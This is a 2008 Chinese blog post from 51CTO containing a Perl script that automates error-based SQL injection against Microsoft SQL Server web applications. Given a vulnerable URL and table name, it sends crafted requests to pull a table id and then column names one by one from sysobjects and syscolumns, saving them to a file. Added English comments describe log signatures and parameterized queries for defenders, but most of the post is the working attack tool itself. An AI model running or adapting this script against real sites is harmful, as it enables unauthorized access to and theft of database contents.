perl在mssql注入中爆表列
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处、作者信息和本声明。否则将追究法律责任。http://n3tl04d.blog.51cto.com/89255/71369
#!/usr/bin/perl -w
#Codz By N3tl04D
#Date 2008-4-13
#
# What this script does, as far as the code shows: given a URL with an
# injectable parameter and a table name, it sends GET requests that append
# URL-encoded SQL conditions referencing congaltan.dbo.sysobjects and
# congaltan.dbo.syscolumns, pulls a table id and then column names out of
# the response bodies, prints them, and appends them to e:/perl/count.txt.
#
# Notes for defenders reading this sample:
#  - Every request carries "%20and%200<>(select" together with the literal
#    "sysobjects" or "syscolumns" in the query string, and the column loop
#    sends them back to back with a growing "not%20in(...)" list, so the
#    activity is visible in web-server access logs and to request filters.
#  - Extraction relies entirely on the response body containing text that
#    matches  value '...'  (presumably a database error message echoed by
#    the application - confirm against the target stack). An application
#    that returns a generic error page gives the regex nothing to match.
#  - The server-side root cause is a query assembled by string
#    concatenation; bound parameters remove it, and a low-privilege database
#    login limits what the system catalogs expose.
use strict;
use LWP;

# Exactly two arguments are required; the usage text names them as the
# injection point (URL) and the table name.
if(@ARGV != 2){
    print "用法:$0 注入点 表名";
    exit;
}

my $browser;            # shared LWP::UserAgent, created on first do_GET call
my $start=time();       # start time for the elapsed-seconds report below
my $talbe=$ARGV[1];     # table name (variable name is misspelled in the original)
my $vul=$ARGV[0];       # base URL that the SQL conditions are appended to

# Perform an HTTP GET with the given arguments.
# List context: returns (content, status_line, is_success, response object).
# Scalar context: returns the content, or nothing when the request failed.
sub do_GET {
    $browser = LWP::UserAgent->new unless $browser;
    my $resp = $browser->get(@_);
    return ($resp->content, $resp->status_line, $resp->is_success, $resp) if wantarray;
    return unless $resp->is_success;
    return $resp->content;
}

# First request: the table name from the command line is concatenated into
# the condition without any escaping.
my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))";
# Called in list context, so content is returned even for non-2xx responses;
# $status and $is_success are never inspected.
my ($content, $status, $is_success) = do_GET($tabl);
if ($content =~ m{value \'(.+?)\'}gi) {
    print "得到表ID:$1\n";
    # Append mode, bareword filehandle, hard-coded Windows path.
    open(FILE,">>e:/perl/count.txt") || die ("Could not open file");
    print FILE "===============================================================\n表名:$talbe ID:$1\n";
    close(FILE);
    crake($1);
}
else
{
    print "不能爆表\n";
    # NOTE(review): this `last` is not inside any loop block.
    last;
}

# Request column names one at a time for the table id passed as $_[0].
# Each found name is printed, remembered in @arr1 and handed to save().
# Stops at the first response without a  value '...'  match, or after
# 470 requests.
sub crake {
    my @arr1=();
    for (my $j=1;$j<=470;$j++)
    {
        print "猜解第$j个表列\n";
        # join() returns one string, so @arr holds a single element; it is
        # interpolated into the quoted not-in list of names already seen.
        my @arr=join("','",@arr1);
        my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))";
        my ($content, $status, $is_success) = do_GET($url);
        if ($content =~ m{value \'(.+?)\'}gi) {
            print "得到表列:$1\n";
            push(@arr1,$1);
            save($1);
        }
        else
        {
            print "猜解完成\n";
            last;
        }
    }
}

# Top-level statements: these run after the if/else above has finished,
# because sub definitions are not executed in sequence.
my $end=time();
my $time=$end-$start;
print "用时".$time."秒\n";

# Append one column name, prefixed with "-", to the same output file that
# the table header was written to.
sub save {
    open(FILE1,">>e:/perl/count.txt") || die ("Could not open file");
    print FILE1 "-$_[0]\n";
    close(FILE1);
}

# Source attribution carried by the page: "n3tl04d's Blog" on 51CTO.COM,
# http://n3tl04d.blog.51cto.com/89255/71369 (the post asks that this
# attribution be kept).


n3tl04d